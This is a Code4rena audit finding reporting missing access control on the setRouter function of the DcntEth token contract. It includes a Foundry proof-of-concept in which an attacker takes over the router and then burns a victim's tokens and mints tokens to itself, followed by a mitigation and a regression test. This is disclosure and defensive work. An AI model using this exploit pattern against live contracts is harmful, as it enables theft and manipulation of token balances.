Platform: Code4rena
Start Date: 19/01/2024
Pot Size: $36,500 USDC
Total HM: 9
Participants: 113
Period: 3 days
Judge: 0xsomeone
Id: 322
League: ETH
Rank: 73/113
Findings: 1
Award: $0.12
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: NPCsCorp
Also found by: 0x11singh99, 0xAadi, 0xBugSlayer, 0xE1, 0xPluto, 0xSimeon, 0xSmartContract, 0xabhay, 0xdice91, 0xprinc, Aamir, Aymen0909, CDSecurity, DadeKuma, DarkTower, EV_om, Eeyore, GeekyLumberjack, GhK3Ndf, Giorgio, Greed, Inference, JanuaryPersimmon2024, Kaysoft, Krace, Matue, MrPotatoMagic, NentoR, Nikki, PUSH0, Soliditors, Tendency, Tigerfrake, Timeless, Timenov, ZanyBonzy, ZdravkoHr, abiih, adeolu, al88nsk, azanux, bareli, boredpukar, cu5t0mpeo, d4r3d3v1l, darksnow, deth, dutra, ether_sky, haxatron, ke1caM, kodyvim, m4ttm, mgf15, mrudenko, nmirchev8, nobody2018, nuthan2x, peanuts, piyushshukla, ravikiranweb3, rouhsamad, seraviz, simplor, slylandro_star, stealth, th13vn, vnavascues, wangxx2026, zaevlad
0.1172 USDC - $0.12
The `DcntEth` contract contains a critical security flaw due to missing access control on the `setRouter` function. An attacker can exploit this by setting themselves as the router and then using the `burn` and `mint` functions to arbitrarily burn tokens from any address and mint tokens to any address. This vulnerability could lead to unauthorized token manipulation, significantly compromising the integrity of the token supply and potentially leading to financial losses for token holders.
The vulnerability sequence can be broken down as follows:

The attacker calls `setRouter` to set themselves as the router.

```solidity
contract DcntEth is OFTV2 {
    // ...
    function setRouter(address _router) public {
        router = _router;
    }
    // ...
}
```

Due to the lack of access control, any user, including an attacker, can call this function.

Unauthorized Token Burning and Minting: Once the attacker has set themselves as the router, they can then call `burn` and `mint` to manipulate token balances. The attacker can burn tokens from any address. The attacker can mint tokens to any address, including their own.
Foundry POC
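```solidity
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import {DcntEth} from "path/to/DcntEth.sol"; // placeholder path; point it at the project's DcntEth

contract TestDcntEth is Test {
    DcntEth dcntEth;
    address attacker = address(0x1234);
    address victim = address(0x5678);
    address lzEndpoint = address(0xE0); // placeholder LayerZero endpoint, not a real deployment

    function setUp() public {
        dcntEth = new DcntEth(lzEndpoint);
        // Give the victim a balance to lose; burning from an empty account would revert
        deal(address(dcntEth), victim, 1000, true);
        // Attacker, an arbitrary caller, sets themselves as the router
        vm.prank(attacker);
        dcntEth.setRouter(attacker);
    }

    function testUnauthorizedTokenManipulation() public {
        // Attacker burns tokens from the victim's address
        vm.prank(attacker);
        dcntEth.burn(victim, 1000);
        // Attacker mints tokens to their own address
        vm.prank(attacker);
        dcntEth.mint(attacker, 1000);
        // Assertions to validate the attack
        assertEq(dcntEth.balanceOf(victim), 0); // Victim's balance should be reduced
        assertEq(dcntEth.balanceOf(attacker), 1000); // Attacker's balance should increase
    }
}
```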
manual, foundry
To mitigate this issue, the `setRouter` function should include an access control mechanism, such as the `onlyOwner` modifier.
Access Control
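The recommended mitigation as a regression test, added here as an example and not taken from the report or the project's code: `RouterGatedToken` is a hypothetical stand-in for DcntEth that uses a hand-rolled owner check instead of the project's OFTV2 base, and the addresses are constructed. It assumes forge-std is available and checks that a non-owner can neither replace the router nor burn a holder's balance.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "forge-std/Test.sol";

// Hypothetical stand-in for DcntEth: same router-gated mint/burn shape, minimal bookkeeping.
contract RouterGatedToken {
    address public immutable owner;
    address public router;
    mapping(address => uint256) public balanceOf;

    constructor() { owner = msg.sender; }

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }
    modifier onlyRouter() { require(msg.sender == router, "not router"); _; }

    // Hardened: only the owner decides which address may mint and burn.
    function setRouter(address _router) public onlyOwner { router = _router; }

    function mint(address to, uint256 amount) public onlyRouter { balanceOf[to] += amount; }
    function burn(address from, uint256 amount) public onlyRouter { balanceOf[from] -= amount; }
}

contract SetRouterAccessControlTest is Test {
    RouterGatedToken token;
    address router = address(0xA11CE); // constructed addresses
    address attacker = address(0x1234);
    address victim = address(0x5678);

    function setUp() public {
        token = new RouterGatedToken(); // this test contract is the owner
        token.setRouter(router);
        vm.prank(router);
        token.mint(victim, 1000);
    }

    function testNonOwnerCannotTakeOverRouter() public {
        vm.expectRevert("not owner");
        vm.prank(attacker);
        token.setRouter(attacker);
        assertEq(token.router(), router); // router unchanged

        vm.expectRevert("not router");
        vm.prank(attacker);
        token.burn(victim, 1000);
        assertEq(token.balanceOf(victim), 1000); // victim's balance intact
    }
}
```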
#0 - c4-pre-sort
2024-01-24T02:05:46Z
raymondfam marked the issue as sufficient quality report
#1 - c4-pre-sort
2024-01-24T02:05:54Z
raymondfam marked the issue as duplicate of #14
#2 - c4-judge
2024-02-03T13:28:31Z
alex-ppg marked the issue as satisfactory